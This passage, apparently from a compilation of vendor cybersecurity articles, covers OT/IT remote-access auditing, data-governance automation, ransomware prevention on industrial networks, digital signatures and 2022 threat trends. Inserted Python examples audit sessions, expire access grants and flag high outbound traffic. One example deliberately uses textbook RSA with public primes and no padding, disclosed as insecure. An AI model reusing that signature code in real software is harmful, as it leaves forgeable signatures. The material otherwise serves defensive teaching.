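    return Session(sid, account, operator, role, proto.lower(), target,
                   datetime.fromisoformat(start), datetime.fromisoformat(end))


def audit_session(s: Session) -> list[str]:
    """Return the policy findings for one session (empty list means clean)."""
    findings = []
    policy = ROLE_POLICY.get(s.role)
    if policy is None:
        return [f"{s.session_id}: unknown role '{s.role}'"]
    if s.protocol not in policy["protocols"]:
        findings.append(f"{s.session_id}: protocol {s.protocol} not approved for role {s.role}")
    duration = s.end - s.start
    if duration > timedelta(hours=policy["max_hours"]):
        findings.append(f"{s.session_id}: session lasted {duration}, limit is {policy['max_hours']}h")
    if not s.operator:
        # Shared accounts are tolerated only when a named operator is recorded,
        # which is what individual accountability for shared accounts means here.
        findings.append(f"{s.session_id}: shared account {s.account} used without a named operator")
    return findings


def audit_log(lines: list[str]) -> list[str]:
    """Audit every record in the log and collect all findings."""
    findings = []
    for line in lines:
        findings.extend(audit_session(parse_session_line(line.strip())))
    return findings


# Constructed sample records: id|account|operator|role|protocol|target|start|end
SAMPLE_LOG = [
    "s1|eng-jdoe|J. Doe|plc_engineer|ssh|plc-line3|2022-05-01T08:00:00|2022-05-01T09:30:00",
    "s2|vendor-acme|Acme Tech 42|vendor_support|rdp|hmi-7|2022-05-01T10:00:00|2022-05-01T11:00:00",
    "s3|vendor-acme||vendor_support|rdp|hmi-7|2022-05-01T22:00:00|2022-05-02T03:00:00",
    "s4|eng-jdoe|J. Doe|plc_engineer|rdp|historian-1|2022-05-02T08:00:00|2022-05-02T08:10:00",
]

if __name__ == "__main__":
    for finding in audit_log(SAMPLE_LOG):
        print(finding)
```

On the sample log, s1 and s2 are clean, s3 is flagged twice (a five-hour vendor session on a shared account with nobody named), and s4 is flagged because an engineer role is not approved for RDP. A real deployment would read these records from the remote-access gateway's own session export rather than a hand-written format.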
Ensure Security Without Compromising Business Goals
Converging two unique systems will always present challenges, so when bringing disparate environments
together, it is imperative to be diligent about segmentation and engineering throughout the network.
Comprehensive IT protections and secure remote access protocols should be implemented before
attaching a network to an OT system, otherwise that OT system will inherit all those same vulnerabilities,
an exploitation of which could yield seismic consequences.
In the process of converging the nation’s OT and IT systems, educating one another is of the utmost
priority. There is a concerning lack of understanding on both sides about the other, and if we hope to
converge our critical infrastructure successfully and securely, that must change.
The benefits of convergence are plentiful, from cost to functionality, but the consequences of a faulty
convergence are potentially severe. The process of converging an OT and IT system should be
undertaken patiently and with informed decision making. Above all, visibility and vigilance should be
prioritized, and the principle of least privilege should be followed closely.
About the Author
Josh Brodbent is the Director of Public Sector Solutions Engineering
at BeyondTrust. Throughout his 20-year career, Josh has worked with
multiple federal agencies to secure their networks and architected over
3 million user accounts in the public sector for identity and access
management solutions. At BeyondTrust, Josh leads a team of senior
solutions engineers and architects in supporting the public sector
vertical. BeyondTrust is a worldwide leader in intelligent identity and
access security, empowering organizations to protect identities, stop
threats, and deliver dynamic access to empower and secure a work-
from-anywhere world. Our integrated products and platform offer the
industry's most advanced privileged access management (PAM) solution, enabling organizations to
quickly shrink their attack surface across traditional, cloud and hybrid environments.
Josh can be reached online on LinkedIn and at our company website https://www.beyondtrust.com
Welcome To the Datagovops Revolution
By Ani Chaudhuri, CEO, Dasera
Sales has SalesOps. Marketing has MarketingOps. Engineering and Security have DevOps, DevSecOps,
and SecOps.
It’s high time for Data Governance to have DataGovOps.
Revisiting Data Governance
First, let’s make sure everyone’s on the same page with respect to Data Governance. According to
Google Cloud, Data Governance is (with added emphasis):
    …everything you do to ensure data is secure, private, accurate, available, and usable. It
    includes the actions people must take, the processes they must follow, and the technology that
    supports them throughout the data life cycle… Data governance means setting internal
    standards (data policies) that apply to how data is gathered, stored, processed, and
    disposed of. It governs who can access what kinds of data and what kinds of data are under
    governance.
Data Governance: It’s Everywhere but Nowhere
Data Governance is everywhere. At the same time, it’s nowhere. Here’s what we mean.
Every enterprise collects data. As such, every enterprise has a Data Governance function. Whether or
not it’s formally called Data Governance or has employees with “Data Governance” in their titles is
another question. In most large organizations, the Data Governance function is distributed across multiple
teams, including:
• Security
• Compliance
• Privacy
• Data
• And maybe a few others
Even though Data Governance is distributed across all these functions, Data Governance is often a part-
time role, rather than a full-time dedicated role or team. For example, there are relatively few
professionals dedicated to Data Governance. A few cursory searches on LinkedIn reveal:
• 1,540,000 professionals with “security” in their job title;
• 635,000 professionals with “compliance” in their job title; and
• 16,000 professionals with “data” and “governance” in their job title, a 40X to 100X difference.
So, Data Governance is typically an invisible fabric between existing teams. Or, as we like to say, Data
Governance takes a village -- it’s a shared responsibility that requires coordination and collaboration
across multiple teams.
Data Governance: A Myriad of Manual Tasks
Especially because of its cross-functional nature, Data Governance has traditionally been executed via
manual effort. Going back to the definition above, Data Governance consists of:
• The actions people must take,
• The processes people must follow, and
• The internal standards or data policies that apply to data
That implies a whole lot of manual effort. Take some typical, day-to-day data governance processes
found in many organizations:
• An employee needs temporary access to a specific data set to do an analysis for a project.
    ◦ Employee submits a ticket via Jira or ServiceNow to the Security team to request access
      to the data. Request includes description of the data set, executive sponsor for the project,
      time frame for access to the data set, etc.
    ◦ Security team receives the request and starts an access control assessment.
    ◦ Security team validates the request with the executive sponsor.
    ◦ Security team validates the content of the data set with the Data team.
    ◦ Security team approves the request and grants access to the data set.
    ◦ Later, the Security team revokes the employee’s temporary access to the data set.
• Compliance team asks the Data team to fill out the semi-annual sensitive data audit.
• Compliance team asks the Security team to fill out the quarterly access control audit.
Performing all these manual Data Governance tasks takes a lot of time and energy. In addition -- and
more importantly -- the fact that data is really only being governed on-demand (during an up-front
assessment) or periodically (in recurring audits) highlights a massive vulnerability for most organizations:
apart from those manual up-front assessments and occasional audits, Data Governance is being left up
to chance, good intentions, and best behavior.
Which means data isn’t really being governed at all.
It’s Time for DataGovOps
SalesOps measures and evaluates sales data to determine the effectiveness of a product, sales
process, or campaign. Similarly, MarketingOps measures and evaluates marketing data to determine
the effectiveness of marketing programs and campaigns.
DevOps is the combination of philosophies, practices, and tools that increases an organization's ability
to deliver applications and services at high velocity.
DevSecOps automates the integration of security at every phase of the software development lifecycle,
from initial design through integration, testing, deployment, and software delivery.
By analogy, Data Governance Operations -- or DataGovOps -- is the combination of practices and tools
that:
• Automatically make data more secure, private, accurate, available and usable;
• Guide people to take appropriate action and follow established process to better govern data;
  and
• Continually measure and evaluate how internal data standards, i.e., data policies, are being
  adhered to.
DataGovOps is the collaborative data management practice focused on improving the communication,
integration and automation of context and policy among all Data Governance stakeholders in an
organization, including Security, Compliance, Privacy, and Data Owners. DataGovOps automates the
integration of security and compliance at every phase of the data lifecycle.
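To show what "automating the integration of security and compliance at every phase of the data lifecycle" can mean for the ticket workflow described earlier, here is an added example. It is not Dasera's product or code: a small access registry evaluates temporary-access requests against a sensitivity policy, grants them with an expiry, revokes them automatically when the window closes, and writes every decision to an audit trail, so the quarterly access-control audit becomes a continuous record rather than a form someone fills in. The data-set labels, roles, policy limits and sample requests are all constructed assumptions.

```python
"""Time-bound data-access grants with automatic revocation and a continuous
policy check.  Added example, not Dasera's product or code; the data-set
labels, roles and sample requests are constructed for illustration.
"""
from dataclasses import dataclass, field
from datetime import datetime, timedelta

# Constructed catalogue: data set -> sensitivity label.
DATASETS = {"sales_q1": "internal", "patient_notes": "restricted", "web_logs": "internal"}

# Constructed policy: which roles may be granted which labels, and the longest
# temporary grant allowed for each label.
LABEL_POLICY = {
    "internal":   {"roles": {"analyst", "engineer"}, "max_days": 30},
    "restricted": {"roles": {"clinician"},           "max_days": 7},
}


@dataclass
class Grant:
    user: str
    role: str
    dataset: str
    sponsor: str
    expires: datetime
    active: bool = True


@dataclass
class AccessRegistry:
    grants: list[Grant] = field(default_factory=list)
    audit: list[str] = field(default_factory=list)   # continuous audit trail

    def request(self, user, role, dataset, sponsor, days, now) -> bool:
        """Evaluate a temporary-access request against policy; grant or deny."""
        label = DATASETS.get(dataset)
        policy = LABEL_POLICY.get(label)
        if policy is None or not sponsor:
            self.audit.append(f"{now:%Y-%m-%d} DENY {user} {dataset}: unknown data set or no sponsor")
            return False
        if role not in policy["roles"] or days > policy["max_days"]:
            self.audit.append(
                f"{now:%Y-%m-%d} DENY {user} {dataset}: role {role} / {days}d violates {label} policy")
            return False
        self.grants.append(Grant(user, role, dataset, sponsor, now + timedelta(days=days)))
        self.audit.append(f"{now:%Y-%m-%d} GRANT {user} {dataset} for {days}d (sponsor {sponsor})")
        return True

    def sweep(self, now) -> int:
        """Revoke every expired grant; returns how many were revoked."""
        revoked = 0
        for g in self.grants:
            if g.active and g.expires <= now:
                g.active = False
                revoked += 1
                self.audit.append(f"{now:%Y-%m-%d} REVOKE {g.user} {g.dataset} (expired)")
        return revoked

    def active_access(self, user, now) -> set[str]:
        """Data sets the user can reach right now (expired grants are swept first)."""
        self.sweep(now)
        return {g.dataset for g in self.grants if g.active and g.user == user}


def run_scenario() -> AccessRegistry:
    """Constructed walkthrough of the ticket workflow from the article, automated."""
    reg = AccessRegistry()
    t0 = datetime(2022, 5, 2)
    reg.request("alice", "analyst", "sales_q1", "cfo", 14, t0)          # granted
    reg.request("alice", "analyst", "patient_notes", "cfo", 14, t0)     # denied: role
    reg.request("bob", "clinician", "patient_notes", "cmo", 30, t0)     # denied: too long
    reg.request("bob", "clinician", "patient_notes", "cmo", 5, t0)      # granted
    reg.request("carol", "engineer", "web_logs", "", 3, t0)             # denied: no sponsor
    reg.sweep(t0 + timedelta(days=10))   # bob's 5-day grant expires, alice's does not
    return reg


if __name__ == "__main__":
    for entry in run_scenario().audit:
        print(entry)
```

The point of the design is that the approval, the expiry and the revocation are all driven by the same policy table and leave the same audit trail, so the "Security team revokes access later" step cannot be forgotten and the periodic audit is simply a query over `audit`.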
The cloud has transformed both the volume of data kept in organizations and the speed at which that
data is growing. Given cloud scale and cloud velocity, Data Governance can no longer be a hodge-podge
of manual steps and processes. It’s imperative for enterprises to automate their Data Governance
functions and invest in systems that continuously ensure that their data is being appropriately stored,
used, and deleted.
It’s time for the DataGovOps revolution.
About the Author
Ani Chaudhuri, CEO, Dasera
Ani Chaudhuri is an award-winning executive and entrepreneur with a track record of building
successful products, businesses and teams. Ani is driven to bring
important solutions to market, and has founded four technology
companies to date: eCircle, acquired by Reliance in India; Opelin,
acquired by Hewlett-Packard; Whodini, acquired by Declara; and
Dasera. Prior to Dasera, Ani worked at McKinsey, HP and Tata
Steel. Ani can be reached online at
https://www.linkedin.com/in/anionline/ and at our company
website http://www.dasera.com/
Preventing Ransomware Attacks on
Industrial Networks
By Michael Yehoshua, VP Marketing, SCADAfence
Ransomware Works
That’s the simplest way to explain why ransomware incidents have been growing steadily for the past
two years with no end in sight. The number of ransomware attacks has jumped by 350 percent since 2018,
the average ransom payment has increased by more than 100 percent, downtime is up by 200 percent and
the average cost per incident is on the rise, according to a recent report from PurpleSec.
Threat actor groups with names such as Ryuk, Egregor, Conti, Ragnar Locker, and many others are
ruthless, well-funded, and willing to target anyone, from COVID-19 vaccine manufacturers, automotive
manufacturers, critical infrastructure and governments to hospitals, to get their payday. In fact, the first
ransomware-related death happened this past September, when a German hospital was infected with
ransomware and couldn't treat patients during the COVID-19 outbreak.
As part of SCADAfence’s mission to protect the lives and safety of civilians, we’ve put together this guide
to help you prevent ransomware in your industrial organization.
The Ransomware Encryption Process
Let’s go back to the beginning and discuss how these attacks encrypt systems in the first place.
From the previous ransomware attacks we’ve researched, we learned that from the minute the attackers
get initial access, they can encrypt the entire network in a matter of hours. In other cases, attackers would
spend more time in assessing which assets they want to encrypt and they’d make sure they get to key
servers such as storage and application servers.
Most of the recent ransomware attacks you’re reading about in the news try to terminate antivirus
processes to make sure that their encryption process will go uninterrupted. Recent ransomware variants
such as SNAKE, DoppelPaymer, and LockerGoga even went further by terminating OT-related
processes like Siemens SIMATIC WinCC, Beckhoff TwinCAT, Kepware KEPServerEX, and the OPC
communications protocol. This made sure the industrial process was interrupted, and this increased the
chances that the victims paid the ransom. These types of ransomware attacks were seen in the recent
attacks of Honda and ExecuPharm.
Diagram #1 - An OT Security Challenge: Industrial Components Exposed to Encryption
From what we’ve seen, ransomware generally encrypts Windows and Linux machines. We still haven’t
seen any PLCs being encrypted. However, many industrial services are run on Windows / Linux machines
- such as historians, HMIs, storage, application servers, management portals, and OPC client/servers.
In many cases, ransomware operations would not stop in the IT network, and will also attack OT
segments. More encrypted devices mean a higher monetary ransom demand from the attackers.
Organizations must be able to monitor & detect threats across the IT/OT boundary to effectively identify
risks before reaching process-critical endpoints.
Diagram #2 - Ransomware Prevention: How You Can Prevent Ransomware Attacks On Your Industrial
Networks
Some of the tools and techniques that ransomware operators are using are on the same level that nation-
state threat actors are using on targeted espionage campaigns.
Diagram #3 - Tactics, Techniques & Procedures Most Commonly Used in Ransomware Attacks
We recommend that organizations practice these common security procedures to minimize their
risk of ransomware infection on each step of the kill chain:
Initial Access:
1. RDP
a. If possible, replace RDP with a remote access solution that requires two-factor
authentication; many VPNs now support that. This will require attackers to be verified by,
for example, a code sent via SMS.
b. If you choose to still use RDP, make sure its Windows Update is enabled and is working.
2. Email Phishing
a. Educate the organization’s employees about phishing attacks. Employees should be
suspicious of emails that don’t seem right and not click on suspicious links.
b. Install an anti-phishing solution.
3. Software Vulnerabilities of Internet-Facing Servers
a. Scan your organization’s IP range from outside the network. Verify that all exposed
IP/ports are what you expect them to be.
b. Make sure that automatic security updates are enabled for your exposed services. If one
of your services (such as web servers, for example) does not have that feature, consider
changing it to a similar one that has this feature.
Lateral Movement:
1. Firewalls & Windows Update
a. Enable firewalls on all of your workstations and servers.
b. Make sure that Windows Update is enabled. This will ensure that your machines are patched
for the latest vulnerabilities and are less prone to lateral movement techniques.
c. Microsoft constantly updates its security policies and firewall rules. One good example is that
it disabled the remote creation of processes using the task scheduler ‘at’ command.
2. Endpoint Protection
Endpoint protection works. Beyond blocking classic hackers’ techniques, some also have
defenses against ransomware and will protect your assets from encryption.
3. Network Segmentation
Ideally, you would want to minimize the risk of your industrial network being impacted when
suffering a ransomware attack.
a. To the possible extent, separate the IT network from the OT network segment. Monitor
and limit the access between the segments.
b. Use different management servers to the OT and IT networks (Windows domains, etc).
By doing so, compromising the IT domain will not compromise the OT domain.
4. Constant Network Monitoring
A constant network monitoring platform (we happen to know a really good one), will help you
identify threats while analyzing network traffic and will help you see the bigger picture of what’s
happening in your network.
5. Data Exfiltration
Monitor your network for unusual outbound traffic. Everyday user activity should not generate
uplink traffic of more than about 200 MB per user per day.
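The outbound-volume check in item 5 is simple enough to implement as a daily report, and doing so shows the one caveat that matters: service accounts with legitimately large uplinks (backups, replication) must be allowlisted or they drown out the real signal. The following is an added example, not SCADAfence code; the flow-record format and the sample records are constructed, and the 200 MB threshold is the article's rule of thumb.

```python
"""Flag users whose daily outbound volume exceeds a threshold.

Added example, not SCADAfence code: the flow-record format and sample records
are constructed.  The 200 MB/day figure is the rule of thumb from the article.
"""
from collections import defaultdict

THRESHOLD_BYTES = 200 * 1024 * 1024   # 200 MB per user per day (article's rule of thumb)


def parse_flow(line: str) -> tuple[str, str, str, int]:
    """Parse 'YYYY-MM-DD user direction bytes' (constructed format)."""
    day, user, direction, nbytes = line.split()
    return day, user, direction, int(nbytes)


def daily_outbound(lines) -> dict[tuple[str, str], int]:
    """Sum outbound bytes per (day, user); inbound records are ignored."""
    totals = defaultdict(int)
    for line in lines:
        day, user, direction, nbytes = parse_flow(line)
        if direction == "out":
            totals[(day, user)] += nbytes
    return dict(totals)


def exfil_suspects(lines, threshold=THRESHOLD_BYTES, allowlist=frozenset()):
    """Return (day, user, bytes) for every day a user exceeded the threshold.

    Accounts in `allowlist` (e.g. a backup service with a known large uplink)
    are skipped so that expected bulk transfers do not mask real anomalies.
    """
    return sorted(
        (day, user, n)
        for (day, user), n in daily_outbound(lines).items()
        if n > threshold and user not in allowlist
    )


# Constructed sample flow records: day, account, direction, bytes.
SAMPLE_FLOWS = [
    "2022-05-09 hmi-operator out 15000000",
    "2022-05-09 hmi-operator in 800000000",    # large download, not counted as uplink
    "2022-05-09 eng-jdoe out 120000000",
    "2022-05-09 eng-jdoe out 95000000",        # 215 MB total for the day: flagged
    "2022-05-10 eng-jdoe out 40000000",
    "2022-05-10 backup-svc out 300000000",     # expected bulk transfer: allowlist it
]

if __name__ == "__main__":
    for day, user, n in exfil_suspects(SAMPLE_FLOWS, allowlist={"backup-svc"}):
        print(f"{day} {user}: {n / 1e6:.0f} MB outbound exceeds threshold")
```

Run without an allowlist, both `eng-jdoe` (215 MB on 9 May) and `backup-svc` are reported; with the backup account allowlisted only the engineer's day stands out, which is the alert worth a human's time.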
How SCADAfence Helps You
We provide a comprehensive solution: the SCADAfence platform, which was built to protect industrial
organizations like yours from industrial cyber attacks (including ransomware). It also helps you implement
better security practices through its built-in features. Some of these include:
• Asset Management
• Network Maps
• Traffic Analyzers
These tools will help your organization to implement better network segmentation, to make sure that your
firewalls are functioning properly, and that every device in the OT network is communicating only with
the ones that they should be communicating with. You will also be able to spot assets that are not where
they're supposed to be, for example, forgotten assets in the DMZ.
The platform, which is also the highest-rated OT & IoT security platform, also monitors the network traffic
for any threats, including ones that are found in typical ransomware attacks; such as:
• Security exploits being sent across the network.
• Lateral movement attempts using the latest techniques.
• Network scanning and network reconnaissance.
In the event of a security breach, SCADAfence’s detailed alerts will help you to contain these threats as
quickly as possible. Ultimately, we built this tool to help industrial organizations understand their attack
surface and implement effective segmentation and constant network monitoring for any malicious or
anomalous activity.
We’d like to share with you a true story of our recent incident response to an industrial ransomware
cyberattack. SCADAfence’s incident response team assists companies in cybersecurity emergencies. In
this video, we will review a recent incident response activity in which we took part. This research has
been published with the goal of assisting organizations to plan for such events and reduce the impact of
targeted industrial ransomware in their networks.
For more detailed information on this story, we prepared a full whitepaper here:
About the Author
Michael Yehoshua, VP Marketing, SCADAfence
Michael brings 15 years of marketing creativity and out-
of-the-box thinking to SCADAfence. Before joining the
team, Michael was the Director of Marketing at TrapX
Security, where he was famous for thought leadership
and for turning a small, declining startup into a
successful, profitable world-leading vendor in their
vertical. Prior to that, Michael was the VP of Marketing
at AMC and rebuilt their entire marketing architecture,
bringing in strong revenue figures that the firm hasn't seen
in decades. Michael studied at Harvard Business
School, at Bar Ilan University for his MBA & Lander
College for his BS degrees in Marketing and Business
Management. Michael can be reached at
Michael@scadafence.com and at our company website
https://www.scadafence.com/
Zero-Trust Architecture Is Incomplete Without Digital Signatures
Zero trust is often mistakenly understood as merely a matter of cybersecurity; however,
adhering to zero trust is a crucial factor in agency IT modernization.
By Geoff Mroz, Principal Digital Strategist, Adobe
By design, zero trust mandates that all resources, regardless of physical or network location, undergo
verification, authentication, and thorough authorization before being allowed access to another resource.
The Office of Management and Budget has set 2024 as the target date for the completion of a zero trust
architecture throughout the Federal government.
Agencies are simultaneously in the midst of the largest digital transformation they have ever undertaken.
The pandemic expedited this change, often resulting in hasty and makeshift solutions. On the path to
lasting modernization, zero trust must be assumed in every digital interaction, of which signatures are
among the most prolific.
Accelerating the use of e-signatures is a priority identified for all agencies in the “Executive Order on
Transforming Federal Customer Experience and Service Delivery to Rebuild Trust in Government.” E-
signatures can dramatically reduce paperwork, broaden the accessibility of government services, and
streamline cumbersome approval processes.
However, it is imperative that e-signatures meet the security standards set out by the OMB’s zero trust
memorandum. In instances where additional levels of assurance (LOA) are necessary, digital signatures
are preferable to e-signatures.
What to look for in a digital signature solution
Security requirements for e-signatures vary by region, agency, data and classification levels. E-
signatures use common authentication methods such as passwords or email verification, but for sensitive
information, such minimal precautions are not nearly sufficient.
There are some cases where additional levels of assurance for signer identification are needed, and that’s
where digital signatures come in. Digital signatures are a specific type of e-signature that is backed by a
digital certificate, as proof of the signer’s identity, which is cryptographically bound to the signature field
using public key infrastructure (PKI).
To achieve this strong security posture, digital signatures must uniquely identify each signer.
Furthermore, the signer’s identity must be reconfirmed prior to signing with tools such as a PIN or a
secure signature device like a USB token or cloud-based hardware security module. Digital signatures
must also demonstrate proof of signing with a tamper-evident seal and have the ability to re-confirm
authenticity for at least 10 years.
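The two properties just described, a signer identity bound to the signature through a certificate and a tamper-evident seal over the document, can be seen end to end in a small model. The following is an added example, not Adobe's product or code. It uses textbook RSA on hard-coded, publicly known Mersenne primes with no padding, which is enough to show the binding but is not secure; real deployments use a vetted library (RSA-PSS or ECDSA), X.509 certificates and a hardware-protected signing key. The CA, signer name and document are all constructed for illustration.

```python
"""Tamper-evident document signature bound to a signer certificate.

Added example, not Adobe's product or code.  It uses textbook RSA on
hard-coded Mersenne primes with no padding: enough to show how a signature
is bound to both the document bytes and a CA-certified signer identity, and
nothing more.  Real deployments use a vetted library (RSA-PSS or ECDSA) and
X.509 certificates.
"""
import hashlib
import json

E = 65537


def make_key(p: int, q: int):
    """Return ((n, e), (n, d)) for the given primes (textbook RSA)."""
    n, phi = p * q, (p - 1) * (q - 1)
    return (n, E), (n, pow(E, -1, phi))


def digest(data: bytes, n: int) -> int:
    # SHA-256 of the document, reduced mod n because the toy modulus is
    # shorter than 256 bits.  A real scheme pads the hash instead.
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def sign(data: bytes, priv) -> int:
    n, d = priv
    return pow(digest(data, n), d, n)


def verify(data: bytes, sig: int, pub) -> bool:
    n, e = pub
    return pow(sig, e, n) == digest(data, n)


# Constructed CA and signer keys built from well-known Mersenne primes.
# Anyone can reproduce these; they exist only to make the example run.
CA_PUB, CA_PRIV = make_key(2**107 - 1, 2**127 - 1)
SIGNER_PUB, SIGNER_PRIV = make_key(2**61 - 1, 2**89 - 1)


def issue_cert(subject: str, pub, ca_priv) -> dict:
    """The CA binds a subject name to a public key by signing the pair."""
    body = {"subject": subject, "n": pub[0], "e": pub[1]}
    body_bytes = json.dumps(body, sort_keys=True).encode()
    return {**body, "ca_sig": sign(body_bytes, ca_priv)}


def verify_cert(cert: dict, ca_pub) -> bool:
    """Check that the CA really signed this subject/key pair."""
    body = {k: cert[k] for k in ("subject", "n", "e")}
    return verify(json.dumps(body, sort_keys=True).encode(), cert["ca_sig"], ca_pub)


def sign_document(doc: bytes, cert: dict, signer_priv) -> dict:
    """Signature field: the certificate plus a signature over the document bytes."""
    return {"cert": cert, "sig": sign(doc, signer_priv)}


def verify_document(doc: bytes, field: dict, ca_pub) -> bool:
    """Valid only if the cert chains to the CA and the seal matches the bytes."""
    cert = field["cert"]
    return verify_cert(cert, ca_pub) and verify(doc, field["sig"], (cert["n"], cert["e"]))


# Constructed signer identity and document.
CERT = issue_cert("Jane Doe, Benefits Office", SIGNER_PUB, CA_PRIV)
DOC = b"Benefits application #0001: approved"
FIELD = sign_document(DOC, CERT, SIGNER_PRIV)

if __name__ == "__main__":
    print("original verifies:", verify_document(DOC, FIELD, CA_PUB))
    print("edited copy verifies:", verify_document(DOC + b" (amended)", FIELD, CA_PUB))
```

Changing a single byte of the document, or editing the subject name inside the certificate, makes verification fail, which is what "tamper-evident seal" and "cryptographically bound to the signer's identity" mean in practice. Note that long-term validation (the ten-year re-confirmation mentioned above) additionally needs a trusted timestamp and archived revocation data, which this model omits.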
For agencies seeking to liberate themselves from arduous paper-based authorizations, while also
adhering to zero trust’s strict identity and access management standards, digital signatures are an
invaluable tool.
Government agencies are eager to adopt digitization practices, such as digital signatures, that will
simplify their workload and make the lives of everyday citizens easier. However, security is paramount.
To ensure that any solutions adopted by agencies meet their individual security needs, the Federal Risk
and Authorization Management Program (FedRAMP) was created.
How FedRAMP authorization provides peace of mind
FedRAMP authorizes cloud-based solutions for government agencies at Low, Moderate, and High Impact
levels. The Moderate Impact level accounts for 80% of authorizations and is designed to protect sensitive
data, such as personally identifiable information (PII). Furthermore, the FedRAMP Moderate designation
aligns with NIST controls for zero trust and encryption management, and is FIPS 140-2 verified, which
ensures that cryptographic modules have met NIST security requirements.
With over 325 security controls verified by third-party auditors, agencies can have confidence in their
FedRAMP Moderate tools to ensure the protection of sensitive information and compliance with any zero
trust architecture.
In every department, at every level, both internally and externally, signatures are required to keep track
of approval processes and decision making. In the modern, hybrid world, paper signatures are no longer
feasible, and government agencies should not be trapped in the past because their security standards
are inherently stricter.
Digital signatures can be used for things like government benefits applications, healthcare forms, and
other documents that are part of higher-value, higher-risk, or strictly regulated processes. A FedRAMP
Moderate digital signature solution eases the signing experiences for employees and constituents,
meaning public interactions can have the speed, ease, and security that modern government requires.
The modern government mindset
Additionally, an inevitable factor in the conversation around IT modernization in the federal government
is interoperability. With over 100 federal agencies, it is crucial that any new tools integrate seamlessly
with existing software and function effectively across agencies.
When considering the capacity for interoperability and integration in federal agencies, digital signature
solutions should be compatible with personal ID verification (PIV) cards, common access cards (CAC)
and mobile credentials.
When prioritizing efficiency, solutions capable of wrapping document creation, signature capture,
tracking, and archiving into a consolidated secure workflow are preferable as they relieve agency
employees from the burden of double and triple checking if their documents and download credentials
comply with agency rules.
Achieving digital transformation goals, zero trust architecture, and cross-agency collaboration should not
be viewed as competing priorities. In fact, the three should be understood as part of the same, modern
government mindset. With the right digital signature tool, agencies can satisfy a component of all these
objectives at once.
While digitization tools can unlock unprecedented capabilities for government, protecting citizen and
agency data is critical. Agency IT leaders should seek out FedRAMP certified solutions that can enable
them to work effectively in a digital world, without compromising on security.
About the Author
Geoff is the Principal Digital Strategist at Adobe. In his
nearly 14 years with the company, Geoff has been an
invaluable solutions consultant who consistently strives for
digital innovation. He possesses extensive knowledge of
enterprise security architecture, full lifecycle enterprise
application development, agile coding, enterprise
applications integration, SOA, and UI/X design and
construction across a wide range of technical architectures.
Perhaps even more important, Geoff has a knack for
bringing people, businesses, and technology together to
help companies deliver on the promise of digital
transformation and creative productivity.
Geoff can be reached online at https://www.linkedin.com/in/geoffreymroz/ and at our company website
https://business.adobe.com/solutions/industries/government.html
Trends To Ensure Cybersecurity In 2022
By Héctor Guillermo Martínez, President of GM Sectec
With the arrival of the pandemic almost 2 years ago, it became clear that companies are increasingly
vulnerable to attacks by hackers and cybercriminals. In this period, in particular, these incidents have
occurred in large part because most companies have had to work with their workforce from home,
which has opened up a huge gap that cybercriminals have been able to exploit. Below, we share some
reflections that assess critical trends that CISOs (Chief Information Security Officers) must take into
account during 2022.
Ransomware or data hijacking is not going away anytime soon. Because of the particular conditions of
working from home, this attack modality has become standard and increased considerably throughout
2021, since workers do not have the protection their equipment needs to avoid any kind of vulnerability
of their data. The 2021 figures seem to ensure that in 2022 this type of cyber threat will continue.
In 2021, almost 500 million cyber-attacks of this type have been recorded, which is equivalent to an
increase of 148 percent compared to 2020, according to a SonicWall report presented at a conference
held at the White House. The most affected segment, and one that will surely continue to be targeted by
cybercriminals, will be the banking sector.
Log4j will be the most serious cybersecurity flaw in decades. The flaw is present in a popular software
called Log4j, which is part of the ubiquitous Java programming language. Log4j is used by millions of
websites and applications, and the software flaw potentially allows hackers to take control of systems by
writing a simple line of code. This bug is more serious than other cybersecurity flaws because of its
ubiquity, simplicity, and complexity. It is a piece of software, open source, that is in millions of devices,
from video games to hospital equipment to industrial control systems to cloud services.
Website cloning and online fraud. Website cloning will be one of the threats that users in general will
have to watch out for, because cybercriminals have become expert cloners of "official" web pages,
through which they carry out frauds that put personal and banking data at risk.
Verifying the veracity of the website and providing tools for users to understand how to perform this
verification will be the key in 2022 for cybersecurity companies to support their customers.
The normalization and massification of the use of cryptocurrencies. Although there are already many
places where the use of cryptocurrencies is becoming widespread, we must not forget that this is the
preferred method of payment for cybercriminals, and that thanks to its use it is possible to access user
data.
This payment method, unlike regular money, does not have the protection of banking regulations and
could make its holders easy targets for cybercriminals, who could use any type of ransomware to hijack
and use their data.
The use of cybersecurity will be mandatory. Much has happened throughout these almost two years of
pandemic, but if we have witnessed anything, it is that cybersecurity should not be an option but the
norm.
Not only have large corporations understood that their cybersecurity systems must be updated and
extended to personal devices, but Latin American governments have understood that cybersecurity must
be regulated and become a mandatory standard to be applied.
During 2022, we will see how governments in much of the region will impose on public and private
companies the use of new cybersecurity tools that expand their scope and protect the data of the people
involved with a broader spectrum.
More contactless payment technology, fewer physical transactions. The use of digital channels in banking
has had a positive impact during the confinements, which has led banks to encourage the use of different
technological options during the day-to-day life of consumers. Electronic payment, in its different
modalities, will continue to gain strength. This makes it even more important to establish controls and
standards (such as PCI DSS) in organizations that process, store and/or transmit cardholder data, to
secure such data, in order to avoid fraud involving debit and credit payment cards.
Already in 2022, and with the expectation of a return to normality, the question to answer is: has the
learning from these two years of pandemic helped companies to understand that the protection of their
human resources' data goes beyond the walls of their organization?
About the Author
Hector Guillermo Martínez is President at GM Sectec. Hector G is
responsible for the growth, vision, and execution of the company. GM
Sectec creates innovative tailored solutions that help accelerate business
breakthroughs in the areas of managed detection and response services,
digital forensics, multi-tenancy, business continuity, information security,
automation, and process orchestration with the goal of ultimately delivering
outstanding cost efficiencies to our customers and partner community. GM
Sectec is a global company with Headquarters in Puerto Rico and offices
in Florida, Mexico, Panama, Colombia, Brazil, Chile, Spain, and Australia
with clients in over fifty countries. GM Sectec is a global Cybersecurity 150
listed company, a Top 100 MSSP listed organization, a certified PCI
Forensic Investigator, and a member of the Forum of Incident Response
and Security Teams (FIRST.org). Hector G. has been with GM Sectec
since 2014.
Prior to GM Sectec, Hector G. was based in Singapore leading EMC Corporation’s security practice
across the Asia Pacific region. Hector G. joined EMC in 2008, focusing on physical & information security
initiatives, projects, and evangelizing EMC’s leadership in the vertical as well as managing Aerospace &
Defense alliances with Raytheon, General Dynamics, BAE,
Lockheed Martin among other MSI’s (Mission Systems Integrators). With over 20 years in business
development, security & safety platform integration and cross jurisdictional law enforcement, Hector G.
has been involved in project implementation, development, and investigations in the United States, Israel,
Asia-Pacific, and Latin America.
Reporting directly to EMC's APJ Chief Technology Officer, Hector G was tasked with developing markets
for EMC in Asia Pacific / Japan across the entire EMC & RSA product and solution portfolio of market
leading technologies. The CTO office owns the technology evolution for EMC Corporation, including
